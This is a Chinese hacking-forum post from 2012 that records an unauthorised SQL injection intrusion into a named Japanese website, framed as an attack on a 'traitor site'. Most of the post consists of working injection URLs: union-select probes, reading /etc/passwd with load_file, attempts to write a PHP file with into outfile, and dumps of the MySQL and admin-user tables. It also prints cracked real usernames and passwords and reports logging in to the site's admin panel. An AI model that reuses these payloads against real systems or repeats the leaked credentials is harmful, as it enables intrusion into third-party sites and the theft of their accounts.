找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 3836|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
) A3 C7 e) Q9 j

8 w7 G* x- d( b' n: Z2 i% G/ Y0x01. 检测 www.zuaa.jp 收集数据
5 q$ `% q4 e; X- D0 {. j% @4 c1 Z" |% D# c7 }$ a) x( P6 r: |4 i- i

2 Z( s4 {% |1 d' Pwhatweb0 w, O! H( ~, x4 J2 O

1 S$ j/ v. y) ^# |: }0 l0 G4 x; H) k% _6 h
利用NMAP扫描
7 |) {4 s* [. M1 q$ B' @
6 e4 |1 p) h! p3 l# E中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持: A" U0 v+ G( J/ U' n) M1 B- v% n: s
0x02.找注入点
5 S2 K2 J* x2 a, Y+ ]找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
0 y7 X. |2 U3 U/ H7 q3 w  v6 t/ T. k& N" ]
9 R+ n7 b) G3 ]0 @2 f- _% @3 M& u
0x03.order by
/ z& _* @; _9 W4 D; j- A             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 15 G7 y3 g$ Y0 h8 s3 F; @# ~7 ^% h

" k2 w% m+ d* H  [6 r6 @# worder by 28报错,order by 27正常
. t* x" L/ F1 r+ l4 S
7 c  F" y! s9 y0x04.   union手动查询
4 l) @. a+ j; a* v) yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 2 l( r, l+ b) ~4 S9 ]$ z0 v
添加到 27 时正常显示 0 T1 v; _/ ~: c0 `/ W9 R

3 g  U' C- X1 e7 K中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ N  Y( X7 R! S5 ?3 ~
$ [) v  B& q" I% |8 |8 j4 X% H
0x05. info:. l9 S: f' t8 G7 l* r' T
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 8 @  o% U, ^3 }) ?1 T
& Q3 N) }6 D( I
user:            root@localhost
! `3 u6 z" L0 y0 F7 K$ zdatabase:    openpne& i, V5 r( O2 c' ?
version:      4.1.222 c- I, ]* ?; e  t: M
os:             portbld-freebsd5.4
( k! b+ {9 i" U4 y# l- }7 o4 z6 J8 g5 R$ w# k/ c  ?0 M% A1 a
0x06. root用户
- x. Y5 o6 M2 v. L' F利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)  S! S  o9 T: [, W2 u7 j7 r
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) r' ?8 L; p1 u% `3 j# v4 r) Y: }% o4 l8 w8 j
通过工具转换. U) x8 D& s8 G: M3 I
. Z0 x6 u- g  ~: ?) q8 o
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 r. I# F+ Z! \) R7 ]  B$ w" b  s
' ?8 M! t: A5 @8 m8 L, ~  S
0x07. 利用 into outfile7 m5 U: Z) X+ R+ Z8 g, Q
全部都失败
, M, ~/ s8 R1 X3 l8 j+ l, ]; k, k& Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php. `) N' M+ ?& `
3 P" N4 G- o9 M: R5 U* m) M7 t
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 8 Y; l$ |) k* l
$ d  S& b  I1 _( o# f
页面显示“MDB2 Error:syntax error”4 d+ @$ d' g8 C; ]
3 j6 _" j  O0 K; ^
0x08. 利用 mysql 4.1+ n9 H( v/ r3 h, N# w
猜常规表名,字段未果 工具 sqlmap! Q' g+ F- x$ }- f- D! b% g8 [
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# Q/ \  x9 `: B1 O0 ^
0 V) p% D* m& {

0 Y7 B( t3 x" p4 ^+ P( p; g9 C$ [8 z
+ e$ T) e/ G8 h8 K0x09. 查找后台
3 Q! @1 C9 o' [0 ?1 Q; H4 Y& }# n% G* T. Z利用 现有的各种 后台工具尝试都不行- `2 z, ?) h/ a# p4 c4 e
: \- T& d' v( x) g
0x10.  MySL外联方法
3 y: O, D* n( z/ p$ L6 M6 g, K从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行# x. C, c  ]6 T6 [, N1 l3 A
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user5 Y8 b% a& ]$ h' R! b
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user8 O$ o- i# `8 T
( E; v9 G4 j4 `5 P& `, s; {
这个可以在 www.cmd5.com 解密
" Q7 P8 `7 ^2 w& O2 f' @& r" ^root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20099 _& E3 l- G9 \- Q/ l
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
2 e( x6 U. V: v8 l6 T# Q( N& Copenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???' Q  z9 d  g. J$ q* G
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???8 i. A* D0 F; Y7 {( F  ?
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知" v: {  h0 z3 X% H3 @
- ~- [5 k2 P- m4 A! N2 w* J# C/ d: A& U& F
9 |* H/ U+ p& p3 @7 g
0x11. 网站突破
( \5 ?1 C1 H6 J发现网站的源程序 openpne, google 下载 openpne 源码
1 k& V  T3 i, k7 J1 P8 C- z+ Y# n7 E( p

& G/ l, Z# Q3 s! e7 j5 q0x12. 默认信息利用* R/ k9 m' C. y  {, r
http://sns.zuaa.jp/?m=admin&a=page_login
# L  E9 r5 t9 k8 e
3 A7 j6 w8 g! x2 w% j3 o9 i表名 (c_admin_user) ,字段名(username,password)
$ J7 Q) C4 v- W; A5 Ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user! M$ ?1 L: b5 I  v8 L
' u7 Y* T! k& N7 V
解密
% e: M: X/ d3 w" o2 I* p$ Z2 H( W2 }zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
" B+ `& U/ \# jzuaajp:c0923ec5857796a393da99905008c176,          zju18977 T% N8 Z# i: u3 S( P% u  ]
, H5 _# J! z, y% q3 E4 C
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
. k& x& ?& b! Z7 a* m2 L$ I* {( ]3 i1 V+ J3 B/ i
0x13. 登录后台
' z2 V' T- Q" i1 E
. y9 R8 t, G1 V, h1 O* V( l1 k$ w5 W( o# J. L1 f- |

' j; {! B" @( w6 O0x14. 小结  H" X  o: H1 ?" S/ i
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
% E8 A+ }3 |- ~, a- f感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. Y' @; L9 @6 K+ L------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
. Z$ r1 E* l) ~3 V) g2 [" X中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! A3 Q9 F+ E% V" Z3 e/ t4 R" X- b
- V: s* ~! z/ X; `4 E0 y, \+ r最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!) D0 p  I, _, J4 i; a

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表